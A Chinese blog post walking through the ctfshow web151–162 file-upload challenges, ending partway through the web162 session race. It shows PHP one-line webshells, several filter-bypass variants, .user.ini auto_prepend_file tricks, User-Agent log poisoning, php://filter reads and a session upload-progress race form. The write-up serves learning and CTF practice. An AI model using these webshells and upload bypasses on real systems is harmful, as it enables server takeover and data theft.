



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="不说永远  珍惜现在" href="http://example.com/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="不说永远  珍惜现在" href="http://example.com/atom.xml" />
<link rel="alternate" type="application/json" title="不说永远  珍惜现在" href="http://example.com/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="CTF,Web,文件上传,木马上传,命令执行RCE,日志包含,Linux系统命令,session条件竞争,Webshell" />


<link rel="canonical" href="http://example.com/2025/09/06/ctfshow%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">



  <title>
ctfshow文件上传 - ctfshow-web入门wp |
AlgoZZi's Blog = 不说永远  珍惜现在</title>
<meta name="generator" content="Hexo 7.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">ctfshow文件上传
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2025-09-06 16:55:54">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2025-09-06T16:55:54+08:00">2025-09-06</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>19k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>17 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">AlgoZZi's Blog</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="/images/bg/17.jpg"></li>
          <li class="item" data-background-image="/images/bg/11.jpg"></li>
          <li class="item" data-background-image="/images/bg/21.jpg"></li>
          <li class="item" data-background-image="/images/bg/1.jpg"></li>
          <li class="item" data-background-image="/images/bg/6.jpg"></li>
          <li class="item" data-background-image="/images/bg/2.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/ctfshow-web%E5%85%A5%E9%97%A8wp/" itemprop="item" rel="index" title="分类于 ctfshow-web入门wp"><span itemprop="name">ctfshow-web入门wp</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://example.com/2025/09/06/ctfshow%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="AlgoZZi">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="不说永远  珍惜现在">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="web151"><a href="#web151" class="headerlink" title="web151"></a>web151</h1><p><strong>1.前端校验</strong></p>
<p><strong>指在用户提交数据之前，由浏览器或客户端对数据进行验证。常见方式有：</strong></p>
<ul>
<li><strong>JavaScript 编写校验逻辑</strong></li>
<li><strong>HTML 表单属性（如 <code>required</code>、<code>pattern</code> 等）</strong></li>
</ul>
<p><strong>作用：提升用户体验，减少无效提交。</strong></p>
<p><strong>2.后端验证</strong></p>
<p><strong>指服务器在接收到用户提交的数据后，对其进行校验和过滤，确保数据符合预期。</strong></p>
<p><strong>作用：保证数据的安全性与正确性，防止恶意提交。</strong></p>
<p><strong>3.总结</strong></p>
<ul>
<li><strong>前端校验：提升用户体验，但容易被绕过。</strong></li>
<li><strong>后端验证：确保数据安全，必须执行。</strong></li>
<li><strong>仅有前端校验而缺少后端验证，形同虚设。</strong></li>
</ul>
<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解一&#x3D;&#x3D;</strong></p>
<p><strong>查看源代码得知上传图片格式限制为 <code>png</code> ，将其修改为 <code>php</code> 格式</strong></p>
<img data-src="\images\article_images\image-20250818173725365.png" alt="image-20250818173725365" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>上传一句话木马</strong></p>
<pre><code class="php">&lt;?php @eval($_POSY[a]);?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250818174234099.png" alt="image-20250818174234099" style="zoom: 33%;" />

<p>&nbsp;</p>
<img data-src="\images\article_images\image-20250818173757367.png" alt="image-20250818173757367" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>访问文件保存路径 <code>靶机/upload/muma.php</code> 并进行 rce</strong></p>
<p><strong>查看上一级目录</strong></p>
<pre><code class="php">#GET
/upload/muma.php

#POST
a=system(&quot;ls ../&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250818173838837.png" alt="image-20250818173838837" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>查看flag</strong></p>
<pre><code class="php">#GET
/upload/muma.php

#POST
a=system(&quot;tac ../flag.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250818173939197.png" alt="image-20250818173939197" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解二&#x3D;&#x3D;</strong></p>
<p><strong>制作一句话木马图片</strong></p>
<p><strong>在 <code>txt</code> 中写入一句话木马，修改 <code>muma.txt</code> 文件名后缀，重命名为 <code>muma.png</code></strong></p>
<img data-src="\images\article_images\image-20250818175506878.png" alt="image-20250818175506878" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>上传 <code>png</code> 文件并抓包</strong></p>
<p><strong>在Repeater中修改 <code>png</code> 为 <code>php</code></strong></p>
<img data-src="\images\article_images\image-20250818175748747.png" alt="image-20250818175748747" style="zoom:33%;" />

<p>&nbsp;</p>
<p><strong>连接蚁剑拿到flag（ <code>靶机/upload/muma.php</code> ；密码：<code>a</code> ）</strong></p>
<img data-src="\images\article_images\image-20250818180017322.png" alt="image-20250818180017322" style="zoom: 33%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web152"><a href="#web152" class="headerlink" title="web152"></a>web152</h1><p><strong>Content-Type 校验</strong></p>
<p><strong><code>Content-Type</code> 是 HTTP 协议中的一个头字段，用于指示发送给接收方的数据的媒体类型（也称为MIME类型）</strong></p>
<ul>
<li><p><strong>机制：服务器除了看文件扩展名，还会检查上传请求中的 HTTP 头部 <code>Content-Type</code>。</strong><br><strong>例如：</strong></p>
<pre><code class="php">Content-Type: image/png
</code></pre>
<p><strong>如果不是图片类型，就拒绝上传。</strong></p>
</li>
<li><p><strong>考点：MIME 类型伪造。</strong></p>
<ol>
<li><p><strong>浏览器&#x2F;工具上传时，<code>Content-Type</code> 是由客户端自己声明的。</strong></p>
</li>
<li><p><strong>这意味着攻击者完全可以在 BurpSuite、Postman、curl 中篡改请求头，把一个 PHP 文件伪装成：</strong></p>
<pre><code class="php">Content-Type: image/png
</code></pre>
</li>
<li><p><strong>服务器如果只信任 <code>Content-Type</code>，那其实依然能上传成功。</strong></p>
</li>
</ol>
</li>
</ul>
<p>&nbsp;</p>
<blockquote>
<p><strong>常见的 Content-Type 值</strong></p>
<p><strong>1.文本类型:</strong></p>
<ul>
<li><p><strong>text&#x2F;html: HTML 文档</strong></p>
</li>
<li><p><strong>text&#x2F;plain: 纯文本</strong></p>
</li>
<li><p><strong>text&#x2F;css: CSS 样式表</strong></p>
</li>
<li><p><strong>text&#x2F;javascript: JavaScript 文件</strong></p>
</li>
</ul>
<p>&nbsp;</p>
<p><strong>2.应用类型:</strong></p>
<ul>
<li><p><strong>application&#x2F;json: JSON 数据格式</strong></p>
</li>
<li><p><strong>application&#x2F;xml: XML 数据格式</strong></p>
</li>
<li><p><strong>application&#x2F;x-www-form-urlencoded: 表单数据，以键值对方式编码，通常用于 POST 请求</strong></p>
</li>
<li><p><strong>multipart&#x2F;form-data: 表单数据，通常用于文件上传时</strong></p>
</li>
</ul>
<p>&nbsp;</p>
<p><strong>3.图片类型:</strong></p>
<ul>
<li><p><strong>image&#x2F;jpeg: JPEG 图像</strong></p>
</li>
<li><p><strong>image&#x2F;png: PNG 图像</strong></p>
</li>
<li><p><strong>image&#x2F;gif: GIF 图像</strong></p>
</li>
</ul>
<p>&nbsp;</p>
<p><strong>4.音频&#x2F;视频类型:</strong></p>
<ul>
<li><strong>audio&#x2F;mpeg: MP3 音频</strong></li>
<li><strong>video&#x2F;mp4: MP4 视频</strong></li>
</ul>
</blockquote>
<p>&nbsp;</p>
<p><strong>因此，这一题不能通过修改源代码直接上传php木马解题</strong></p>
<p>&nbsp;</p>
<p><strong>同样上传 <code>muma.png</code> 并抓包，在Repeater中修改 <code>png</code> 为 <code>php</code></strong></p>
<img data-src="\images\article_images\image-20250818193032111.png" alt="image-20250818193032111" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>查看flag</strong></p>
<pre><code class="php">#GET
/upload/muma.php

#POST
a=system(&quot;tac ../flag.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250818192416603.png" alt="image-20250818192416603" style="zoom:25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web153"><a href="#web153" class="headerlink" title="web153"></a>web153</h1><p><strong><code>php.ini</code>：全局配置文件，影响整个 PHP 环境。</strong></p>
<p><strong><code>.user.ini</code>：目录级配置文件，只影响所在目录及子目录（类似 <code>.htaccess</code>）；用户可以通过 <code>.user.ini</code> 文件来设置特定目录和子目录下的 PHP 配置。这些设置会覆盖全局 <code>php.ini</code> 的相应配置。</strong><br><strong>可以通过配置选项使每个php文件头或文件尾都进行文件包含</strong></p>
<pre><code class="php">auto_prepend_file = &lt;filename&gt;         //包含在文件头
auto_append_file = &lt;filename&gt;          //包含在文件尾
</code></pre>
<p><strong>原理：上传 <code>.user.ini</code>，指定一个文件（如 <code>a.jpg</code>），那么该文件就会被包含在要执行的php文件中（如 <code>index.php</code>），类似于在<code>index.php</code> 中插入一句：<code>require(./a.jpg)</code> ；</strong><br><strong>PHP 执行当前目录的任意 <code>.php</code> 文件时，会 <code>require a.jpg</code></strong><br><strong>这两个设置的区别只是在于 <code>auto_prepend_file</code> 是在文件前插入；<code>auto_append_file</code> 在文件最后插入（当文件调用的有 <code>exit()</code> 时，该设置无效）</strong><br><strong>所以要求当前目录必须要有php文件</strong></p>
<p><strong><code>.user.ini</code> 可以把指定的一个文件包含到目录下&#x3D;&#x3D;所有&#x3D;&#x3D;会以php执行的文件中（比如 <code>index.php</code>、<code>test.php</code>），当访问 <code>index.php</code> 后，这个被指定的文件，无论后缀是什么，都会以php的方式进行读取，所以可以绕过后端检测</strong></p>
<p>&nbsp;</p>
<p><strong>能够访问 <code>靶机/upload</code> ，说明 <code>upload</code> 目录下存在 <code>.php</code> 文件</strong></p>
<p><strong>或者可以通过扫描 <code>靶机/upload</code> 后台，看到目录下有一个 <code>index.php</code> 文件</strong></p>
<img data-src="\images\article_images\image-20250818222405430.png" alt="image-20250818222405430" style="zoom:80%;" />



<p>&nbsp;</p>
<p><strong><code>1.png</code> 内容</strong></p>
<pre><code class="php">auto_prepend_file=muma.png
</code></pre>
<p><strong>上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code></strong></p>
<p>&nbsp;</p>
<img data-src="\images\article_images\image-20250818215940876.png" alt="image-20250818215940876" style="zoom:33%;" />

<p>&nbsp;</p>
<p><strong>上传 <code>muma.png</code></strong></p>
<img data-src="\images\article_images\image-20250818220259213.png" alt="image-20250818220259213" style="zoom:25%;" />



<p>&nbsp;</p>
<pre><code class="php">#GET
/upload/index.php

#POST
a=system(&quot;ls ../&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250818221044605.png" alt="image-20250818221044605" style="zoom:25%;" />

<p>&nbsp;</p>
<pre><code class="php">#GET
/upload/index.php

#POST
a=system(&quot;tac ../flag.php&quot;)
</code></pre>
<img data-src="\images\article_images\image-20250818221114730.png" alt="image-20250818221114730" style="zoom:25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web154"><a href="#web154" class="headerlink" title="web154"></a>web154</h1><p><strong><code>1.png</code> 内容</strong></p>
<pre><code class="php">auto_prepend_file=muma.png
</code></pre>
<p><strong>上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code></strong></p>
<img data-src="\images\article_images\image-20250818224418932.png" alt="image-20250818224418932" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>上传 <code>muma.png</code> ，出现 <code>文件内容不合理</code> 提示</strong></p>
<img data-src="\images\article_images\image-20250818224735310.png" alt="image-20250818224735310" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>修改 <code>muma,png</code> 内容，利用短标签代替 <code>php</code> 可绕过</strong></p>
<pre><code class="php">&lt;?= @eval($_POST[a]);?&gt;
&lt;?Php @eval($_POST[a]);?&gt;
</code></pre>
<p><strong>查看目录</strong></p>
<pre><code class="php">#GET
/upload/

#POST
a=system(&quot;ls ../&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250818225238212.png" alt="image-20250818225238212" style="zoom:20%;" />

<p>&nbsp;</p>
<p><strong>查看flag</strong></p>
<pre><code class="php">#GET
/upload/

#POST
a=system(&quot;tac ../flag.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250818225312977.png" alt="image-20250818225312977" style="zoom:20%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web155"><a href="#web155" class="headerlink" title="web155"></a>web155</h1><p><strong>上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code></strong></p>
<img data-src="\images\article_images\image-20250818230807703.png" alt="image-20250818230807703" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>上传 <code>muma.png</code>，这一题过滤 <code>php</code>(包括大小写）</strong> </p>
<img data-src="\images\article_images\image-20250818230935547.png" alt="image-20250818230935547" style="zoom:25%;" />

<p>&nbsp;</p>
<pre><code class="php">#GET
/upload/
或者
/upload/index.php

#POST
a=system(&quot;tac ../flag.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250818231158000.png" alt="image-20250818231158000" style="zoom:25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web156"><a href="#web156" class="headerlink" title="web156"></a>web156</h1><p><strong>&#x3D;&#x3D;题解一&#x3D;&#x3D;</strong></p>
<p><strong>上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code></strong></p>
<img data-src="\images\article_images\image-20250818232533231.png" alt="image-20250818232533231" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>上传 <code>muma.png</code>，这一题过滤 <code>php</code>、 <code>[</code></strong></p>
<p><strong>使用 <code>&#123;&#125;</code> 代替 <code>[]</code> 绕过</strong> </p>
<img data-src="\images\article_images\image-20250818232518013.png" alt="image-20250818232518013" style="zoom:25%;" />

<p>&nbsp;</p>
<pre><code class="php">#GET
/upload/

#POST
a=system(&quot;tac ../flag.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250818232502599.png" alt="image-20250818232502599" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解二&#x3D;&#x3D;</strong></p>
<p><strong>直接将 <code>auto_prepend_file</code> 改为 <code>1.txt</code></strong></p>
<img data-src="\images\article_images\image-20250818235436046.png" alt="image-20250818235436046" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>直接上传 <code>1.txt</code> ，内容为 <code>&lt;?= system(‘tac ../flag.???’)?&gt;</code></strong></p>
<img data-src="\images\article_images\image-20250818235403094.png" alt="image-20250818235403094" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>直接访问 <code>靶机/upload</code> 拿到flag</strong></p>
<img data-src="\images\article_images\image-20250818235502235.png" alt="image-20250818235502235" style="zoom:25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web157"><a href="#web157" class="headerlink" title="web157"></a>web157</h1><p><strong>&#x3D;&#x3D;题解一&#x3D;&#x3D;</strong></p>
<p><strong>上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code></strong></p>
<img data-src="\images\article_images\image-20250818234431522.png" alt="image-20250818234431522" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>上传 <code>muma.png</code>，这一题过滤 <code>php</code>、 <code>[]</code>、<code>&#123;&#125;</code> 、<code>;</code></strong></p>
<p><strong><code>array_pop()</code> 将数组中最后一个元素取出并删除</strong><br><strong>使用 <code>$_POST</code> 接受任意变量</strong></p>
<pre><code class="php">&lt;?= @eval(array_pop($_POST))?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250818234404492.png" alt="image-20250818234404492" style="zoom:25%;" />

<p>&nbsp;</p>
<pre><code class="php">#GET
/upload/

#POST
a=system(&quot;tac ../flag.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250818234343209.png" alt="image-20250818234343209" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解二&#x3D;&#x3D;</strong></p>
<p><strong>直接将 <code>auto_prepend_file</code> 改为 <code>1.txt</code></strong></p>
<p><strong>这一题过滤了 <code>system</code> 函数</strong></p>
<p><strong>直接上传 <code>1.txt</code> ，内容为 <code>&lt;?= `(‘tac ../flag.???’)`?&gt;</code></strong></p>
<p><strong>直接访问 <code>靶机/upload</code> 拿到flag</strong></p>
<p>&nbsp;</p>
<hr>
<h1 id="web158"><a href="#web158" class="headerlink" title="web158"></a>web158</h1><p>**上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code> **</p>
<img data-src="\images\article_images\image-20250819000053481.png" alt="image-20250819000053481" style="zoom:80%;" />

<p>&nbsp;</p>
<p><strong>上传 <code>muma.png</code>，这一题过滤 <code>php</code>、 <code>[]</code>、<code>&#123;&#125;</code> 、<code>;</code> 、<code>log</code></strong></p>
<p><strong><code>array_pop()</code> 将数组中最后一个元素取出并删除</strong><br><strong>使用 <code>$_POST</code> 接受任意变量</strong></p>
<img data-src="\images\article_images\image-20250819000027970.png" alt="image-20250819000027970" style="zoom:80%;" />

<p>&nbsp;</p>
<pre><code class="php">#GET
/upload/

#POST
a=system(&quot;tac ../flag.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250819000007796.png" alt="image-20250819000007796" style="zoom:25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web159"><a href="#web159" class="headerlink" title="web159"></a>web159</h1><p><strong>&#x3D;&#x3D;题解一&#x3D;&#x3D;</strong></p>
<p><strong>上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code></strong></p>
<img data-src="\images\article_images\image-20250819134826160.png" alt="image-20250819134826160" style="zoom: 25%;" />

<p>&nbsp;</p>
<p><strong>上传 <code>muma.png</code>，这一题过滤 <code>php</code>、 <code>[]</code>、<code>&#123;&#125;</code> 、<code>;</code> 、<code>log</code>、<code>(</code></strong></p>
<pre><code class="php">&lt;?= `tac ../flag.???`?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250819135336499.png" alt="image-20250819135336499" style="zoom:25%;" />

<p>&nbsp;</p>
<pre><code class="php">#GET
/upload/
</code></pre>
<img data-src="\images\article_images\image-20250819135308470.png" alt="image-20250819135308470" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解二&#x3D;&#x3D;</strong></p>
<p><strong>日志包含</strong></p>
<p>&nbsp;</p>
<p><strong>上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code></strong></p>
<img data-src="\images\article_images\image-20250819164024580.png" alt="image-20250819164024580" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>执行日志文件</strong></p>
<pre><code class="php">&lt;?include &#39;/var/lo&#39;.&#39;g/nginx/access.l&#39;.&#39;og&#39;?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250819164002362.png" alt="image-20250819164002362" style="zoom:80%;" />

<p>&nbsp;</p>
<p><strong>访问 <code>靶机/upload</code> 可以查看日志内容，同时在 <code>User-Agent</code> 写入一句话木马</strong></p>
<p><strong>注入后在日志内容可以看见 <code>aaa</code> 标记 ，表明写入成功</strong></p>
<pre><code class="php">#GET
/upload/

#User-Agent
aaa&lt;?php @eval($_POST[a]);?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250819163829147.png" alt="image-20250819163829147" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>连接蚁剑（<code>靶机/upload/</code>)</strong></p>
<p><strong>查看flag</strong></p>
<img data-src="\images\article_images\image-20250819163924591.png" alt="image-20250819163924591" style="zoom:25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web160"><a href="#web160" class="headerlink" title="web160"></a>web160</h1><p><strong>&#x3D;&#x3D;题解一&#x3D;&#x3D;</strong></p>
<p><strong>上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code></strong></p>
<img data-src="\images\article_images\image-20250819165424855.png" alt="image-20250819165424855" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>执行日志文件，这一题过滤 <code>php</code>、 <code>[]</code>、<code>&#123;&#125;</code> 、<code>;</code> 、<code>log</code>、<code>(</code> 、<code>空格</code></strong></p>
<pre><code class="php">&lt;?=include&quot;/var/lo&quot;.&quot;g/nginx/access.lo&quot;.&quot;g&quot;?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250819165409321.png" alt="image-20250819165409321" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>访问 <code>靶机/upload</code> 可以查看日志内容，同时在 <code>User-Agent</code> 写入一句话木马</strong></p>
<p><strong>注入后在日志内容可以看见 <code>aaa</code> 标记 ，表明写入成功</strong></p>
<pre><code class="php">#GET
/upload/

#User-Agent
aaaaa&lt;?php @eval($_POST[a]);?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250819165353188.png" alt="image-20250819165353188" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>连接蚁剑（<code>靶机/upload/</code>)</strong></p>
<p><strong>查看flag</strong></p>
<img data-src="\images\article_images\image-20250819165250645.png" alt="image-20250819165250645" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解二&#x3D;&#x3D;</strong></p>
<p><strong>上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code></strong></p>
<img data-src="\images\article_images\image-20250819170103240.png" alt="image-20250819170103240" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>php伪协议</strong></p>
<pre><code class="php">&lt;?=include&quot;ph&quot;.&quot;p://filter/convert.base64-encode/resource=../flag.p&quot;.&quot;hp&quot;?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250819170048632.png" alt="image-20250819170048632" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>访问 <code>upload</code> ，<code>base64</code> 解码得到flag</strong></p>
<pre><code class="php">#GET
/upload/
</code></pre>
<img data-src="\images\article_images\image-20250819170003662.png" alt="image-20250819170003662" style="zoom:25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web161"><a href="#web161" class="headerlink" title="web161"></a>web161</h1><pre><code class="scss">getimagesize(): 会对目标文件的16进制去进行一个读取，去读取头几个字符串是不是符合图片的要求
</code></pre>
<p><strong>后端会检测png文件是否真的为png，所以要在图片头加上 <code>GIF89a</code></strong></p>
<p>&nbsp;</p>
<p><strong>上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code>，加上 <code>GIF86a</code></strong></p>
<pre><code class="php">GIF89a
auto_prepend_file=&quot;muma.png&quot;
</code></pre>
<img data-src="\images\article_images\image-20250819171303205.png" alt="image-20250819171303205" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>php伪协议，加上 <code>GIF86a</code></strong></p>
<pre><code class="php">GIF89a
&lt;?=include&quot;ph&quot;.&quot;p://filter/convert.base64-encode/resource=../flag.p&quot;.&quot;hp&quot;?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250819171534908.png" alt="image-20250819171534908" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>访问 <code>upload</code> ，<code>base64</code> 解码得到flag</strong></p>
<pre><code class="php">#GET
/upload/
</code></pre>
<img data-src="\images\article_images\image-20250819171519897.png" alt="image-20250819171519897" style="zoom:25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web162"><a href="#web162" class="headerlink" title="web162"></a>web162</h1><p><strong>&#x3D;&#x3D;题解一&#x3D;&#x3D;</strong></p>
<p><strong>session文件上传竞争</strong></p>
<p>&nbsp;</p>
<p><strong>上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code>，加上 <code>GIF86a</code></strong></p>
<pre><code class="php">GIF89a
auto_prepend_file=/tmp/sess_love
</code></pre>
<img data-src="\images\article_images\image-20250819181816577.png" alt="image-20250819181816577" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>利用 <code>POST.html</code> 上传任意一个文件</strong></p>
<p><strong>注意在相应位置修改靶机地址和命令</strong></p>
<pre><code class="html">&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;body&gt;
&lt;!-- 修改靶机地址 --&gt;
&lt;form action=&quot;http://4cd3d241-1c9b-41b4-8616-b78eca5347a6.challenge.ctf.show/&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot;&gt;
&lt;!-- 修改命令 --&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;&lt;?php system(&quot;tac ../flag.php&quot;);?&gt;&quot; /&gt;
    &lt;input type=&quot;file&quot; name=&quot;file&quot; /&gt;
    &lt;input type=&quot;submit&quot; value=&quot;submit&quot; /&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<p>&nbsp;</p>
<p><strong>将抓到的包发送到 <code>Intruder</code> 爆破模块</strong></p>
<p><strong>在 <code>cookie</code> 后添加 <code>PHPSESSID=love</code>（ <code>PHPSESSID</code> 的值任意）</strong></p>
<p><strong>如下示例</strong></p>
<pre><code class="ini">Cookie: PHPSESSID=love
</code></pre>
<p><strong>注意没有 <code>payload</code> 插入点</strong></p>
<p><strong>设置 <code>Payload type</code> 为 <code>Null payloads</code></strong></p>
<p><strong>勾选 <code>Continue indefinitely</code> 无限重复</strong></p>
<img data-src="\images\article_images\image-20250819182340513.png" alt="image-20250819182340513" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>新建 <code>Resource pool</code> 资源池，设置线程 <code>30</code></strong></p>
<p><strong><code>Start attack</code> 开始爆破，不断上传文件</strong></p>
<img data-src="\images\article_images\image-20250819181747316.png" alt="image-20250819181747316" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>访问 <code>靶机/upload/index.php</code> 并抓包</strong></p>
<blockquote>
<p><strong>访问 <code>靶机/upload/index.php</code></strong></p>
<p><strong>相当于在 <code>index.php</code> 文件中执行 <code>include /tmp/sess_love</code></strong></p>
</blockquote>
<p><strong>同上（这里不需要对 <code>cookie</code> 进行修改处理）</strong></p>
<p><strong>将抓到的包发送到 <code>Intruder</code> 爆破模块，注意没有 <code>payload</code> 插入点</strong></p>
<p><strong>设置 <code>Payload type</code> 为 <code>Null payloads</code></strong></p>
<p><strong>勾选 <code>Continue indefinitely</code> 无限重复</strong></p>
<p><strong>新建 <code>Resource pool</code> 资源池，设置线程 <code>80</code> (访问包的线程数需要大于上传包的线程数)</strong></p>
<p><strong><code>Start attack</code> 开始爆破，不断访问文件</strong></p>
